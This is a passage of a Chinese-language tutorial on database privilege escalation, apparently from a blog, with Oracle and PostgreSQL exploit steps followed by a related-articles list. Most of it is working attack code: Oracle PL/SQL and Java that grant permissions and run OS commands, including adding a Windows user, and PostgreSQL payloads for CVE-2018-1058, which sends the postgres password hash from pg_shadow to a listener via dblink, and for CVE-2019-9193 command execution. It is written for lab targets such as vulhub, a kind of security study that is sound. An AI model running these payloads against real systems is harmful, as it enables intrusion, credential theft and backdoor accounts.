             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        
             CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
        
         'writeFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
        
             BEGIN
        
             OPEN C1;
        
             FETCH C1 BULK COLLECT INTO POL;
        
             CLOSE C1;
        
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
        
             END;
        
            /
        
          DECLARE
        
             POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
        
             CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.lang.RuntimePermission',
        
         'readFileDescriptor', 'NULL', 'ENABLED' FROM DUAL;
        
             BEGIN
        
             OPEN C1;
        
             FETCH C1 BULK COLLECT INTO POL;
        
             CLOSE C1;
        
             DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
        
             END;
        
            /
        
  2. 执行任意命令

    1. 复现
      1. 创建java包

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;
      2. 获取java权限

        1. select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''begin dbms_java.grant_permission( ''''SYSTEM'''', ''''SYS:java.io.FilePermission'''', ''''<<all>'''',''''EXECUTE'''');end;''commit;end;') from dual;
      3. 创建执行命令函数

        1.  select dbms_xmlquery.newcontext('declar
           e PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;
          
      4. 执行命令select LinxRUNCMD('whoami') from dual;

  3. 通过注入存储过程提权(低权限提升至DBA)

    1. 原理
      1. SYS创建的存储过程存在sql注入。拥有create procedure权限的用户通过创建提权函数,将提权函数注入到存储过程中,于是该存储过程将调用这个提权函数来执行grant dba to quan命令,获得Oracle数据库dba权限
    2. 利用条件
      1. SYS创建的存储过程存在sql注入(EG:CVE-2005-4832)
      2. 用户拥有create procedure权限(用来创建函数)
    3. 复现
      1. 创建一个java class然后用procedure包装进行调用

        1.  create or replace and resolve java source named JAVACMD as
          
               import java.lang.*;
          
               import java.io.*;
          
               public class JAVACMD
          
               {
          
                  public static void execmd(String command) throws IOException
          
                  {
          
                          Runtime.getRuntime().exec(command);
          
                  }
          
              }
          
              /
          
      2. 创建调用的包

        1.  create or replace procedure MYJAVACMD(command in varchar) as language java
          
          
          
               name 'JAVACMD.execmd(java.lang.String)';
          
           /
          
      3. 执行命令

        1.  EXEC MYJAVACMD('net user cong cong /add');
          
      4. image

PostgreSQl提权

  1. 介绍

    1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。
  2. 复现

    1. 创建函数提权
      1. 介绍

        1. PostgreSQL 是一款关系型数据库。其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作
      2. 靶场:vulhub postgres/CVE-2018-1058

      3. 用普通用户连接数据库,psql --host 192.168.72.130 --username vulhub(vulhub/vulhub)

      4. 执行以下语句即可(注意更换监听ip与端口)

        1.  CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
               select dblink_connect((select 'hostaddr=192.168.1.7 port=1234 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
               SELECT pg_catalog.array_to_string($1,$2);
           $$ LANGUAGE SQL VOLATILE;
          
      5. 监听端口nc -lvvp 1234

      6. 模仿超级管理员使用ps_dump命令:docker_compose exec postgres pg_dump -U postgres -f evil.bak vulhub,后门被触发

        1. image
    2. 高权限提权
      1. 介绍
        1. PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令
      2. 影响版本
        1. 9.3-11.2
      3. 复现
        1. 靶场:vulfocus postgresql 命令执行 (cve-2019-9193)123.58.224.8:31404 31404:5432

        2. 连接postgres/postgres数据库

        3. 删除一个可能存在的函数DROP TABLE IF EXISTS cmd_exec

          1. image
        4. 创建执行命令CREATE TABLE cmd_exec(cmd_output text);

          1. image
        5. 执行系统命令COPY cmd_exec FROM PROGRAM 'whoami'

          1. image
        6. 将结果显示出来SELECT * FROM cmd_exec

          1. image


http://www.kler.cn/a/314598.html

相关文章:

  • DIP switch是什么?
  • 阿里云centos7.9服务器磁盘挂载,切换服务路径
  • 鸿蒙学习基本概念
  • vue请求数据报错,设置支持跨域请求,以及2种请求方法axios或者async与await
  • 【ACM出版】第四届信号处理与通信技术国际学术会议(SPCT 2024)
  • Jetpack 之 Ink API初探
  • 计算机毕业设计 社区医疗服务系统的设计与实现 Java实战项目 附源码+文档+视频讲解
  • web基础—dvwa靶场(四)​File Inclusion
  • 电脑文件防泄密软件哪个好?这六款软件建议收藏【精选推荐】
  • MQ(RabbitMQ)笔记
  • Flutter 约束布局
  • 充电桩项目:前端实现
  • Ubuntu 安装 OpenGL 开发库
  • leetcode第十四题:最长公共前缀
  • 12.Java基础概念-面向对象-static
  • 2024“华为杯”中国研究生数学建模竞赛(A题)深度剖析_数学建模完整过程+详细思路+代码全解析
  • 无线安全(WiFi)
  • 【MySQ】在MySQL里with 的用法
  • 【技术解析】消息中间件MQ:从原理到RabbitMQ实战(深入浅出)
  • 计算机毕业设计之:基于微信小程序的校园流浪猫收养系统(源码+文档+讲解)
  • WEB 编程:富文本编辑器 Quill 配合 Pico.css 样式被影响的问题
  • vue配置axios
  • 使用Java实现高效用户行为监控系统
  • 二叉树(二)深度遍历和广度遍历
  • Redis的三种持久化方法详解
  • Spring Boot实战:使用策略模式优化商品推荐系统